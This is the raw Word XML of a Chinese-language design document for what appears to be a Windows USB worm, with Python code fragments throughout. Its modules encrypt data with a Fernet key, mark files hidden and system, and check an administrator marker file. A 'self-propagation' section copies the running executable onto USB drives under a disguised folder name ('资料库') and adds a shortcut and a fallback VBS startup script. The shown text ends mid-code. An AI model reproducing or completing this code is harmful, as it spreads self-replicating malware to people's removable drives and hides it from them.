              <w:t>open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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">(key_path,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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>'wb'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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>) as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27D2625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22"/>
                <w:szCs w:val="22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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">f.write(Fernet.generate_key()) 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8200"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t># 256-bit密钥</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F316B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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baselin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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Fernet(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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>open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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">(key_path,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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>'rb'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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>).read())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BF94FE4">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0AA913">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3. 文件操作模块 (FileUtils)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97A69F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>set_hidden()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588D57E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6BCF4B"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调用Windows API SetFileAttributesW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7FFA2"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组合设置0x02|0x04(隐藏+系统属性)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFEAFC0"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使用ctypes处理Unicode路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2874419E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>核心实现：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="831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00"/>
        <w:gridCol w:w="7719"/>
      </w:tblGrid>
      <w:tr w14:paraId="2E9CB2C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62" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="31D131C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  <w:p w14:paraId="73F2127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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43887D2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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E27215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77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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="0584A38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20"/>
                <w:szCs w:val="20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ctypes.windll.kernel32.SetFileAttributesW(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42AB7EC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20"/>
                <w:szCs w:val="20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 xml:space="preserve">wintypes.LPCWSTR(path), </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17FAF62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20"/>
                <w:szCs w:val="20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    0x02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 xml:space="preserve">|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0x04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 xml:space="preserve"> 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8200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# FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABAF46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20"/>
                <w:szCs w:val="20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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03570550">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>get_hash()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335264A4">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09336D7A"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采用MD5哈希算法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C3A03"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分块读取(4KB)处理大文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55268A49"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异常捕获避免程序中断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EF4A9">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>核心逻辑：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="829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98"/>
        <w:gridCol w:w="7701"/>
      </w:tblGrid>
      <w:tr w14:paraId="6E6AFCC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97" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="1A04EFB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  <w:p w14:paraId="2C49269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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F982F5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7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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="08F0CD2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24"/>
                <w:szCs w:val="24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with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open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(file_path,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"rb"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) as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="642F572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24"/>
                <w:szCs w:val="24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chunk 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iter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(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lambda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: f.read(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4096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), b""):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292354E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24"/>
                <w:szCs w:val="24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hashlib.md5().update(chunk)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DECFA90">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>check_admin_marker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF1E19">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B962285"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验证administrator.txt文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2482223C"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对比加密令牌的哈希值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606CD190"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防御时序攻击的字符串比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35434CD2">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>安全实现：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="937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75"/>
        <w:gridCol w:w="8704"/>
      </w:tblGrid>
      <w:tr w14:paraId="69661D1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0" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="3259FDC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2"/>
                <w:szCs w:val="22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  <w:p w14:paraId="1DF4CB4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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC3A6B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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4CD6C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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="472EC65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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="311DEF7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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baselin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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>hashlib.sha256(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CFB66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22"/>
                <w:szCs w:val="22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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>    open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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>(marker_path).read().encode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B7AEF3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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">).digest() 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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>hashlib.sha256(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E52000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22"/>
                <w:szCs w:val="22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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>CryptoUtils.decrypt(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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>open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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">(ADMIN_TOKEN_FILE,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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>'rb'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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>).read()).encode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3524733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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>).digest()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FC17929">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5. 自传播模块 (SelfReplicator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED64421">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>spread_to_usb()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C0055F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6D7E5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA57EBE"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三重传播机制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B118536">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="303" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>伪装文件夹（"资料库"）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B764022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="303" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>带参数的快捷方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B630D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="303" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>后备的vbs启动脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C4FA8"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使用COM接口创建正规快捷方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2AC7E5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>核心流程：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="893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4"/>
        <w:gridCol w:w="8295"/>
      </w:tblGrid>
      <w:tr w14:paraId="478A6A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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="49156A2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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B8E06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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0853A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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31457B7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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4545909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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7DC09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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363CDEB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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B5B91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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03EE686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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D0587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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615FCBB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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0967E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2"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="82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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="172336E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22"/>
                <w:szCs w:val="22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8200"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t># 1. 创建伪装目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155EE03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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>FileUtils.create_dir(os.path.join(usb_path, DISGUISE_NAME))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5234DE6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22"/>
                <w:szCs w:val="22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  <w:p w14:paraId="205BD82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22"/>
                <w:szCs w:val="22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8200"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t># 2. 复制本体</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3257CE9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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>shutil.copy2(sys.executable, f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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>"{DISGUISE_NAME}.exe"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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544F940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22"/>
                <w:szCs w:val="22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  <w:p w14:paraId="522EC50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22"/>
                <w:szCs w:val="22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8200"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t># 3. 创建快捷方式</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E5419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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">shell 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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>win32com.client.Dispatch(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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>'WScript.Shell'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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B9F2F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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">shortcut 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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>shell.CreateShortCut(f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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>"{DISGUISE_NAME}.lnk"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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52C2BCA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22"/>
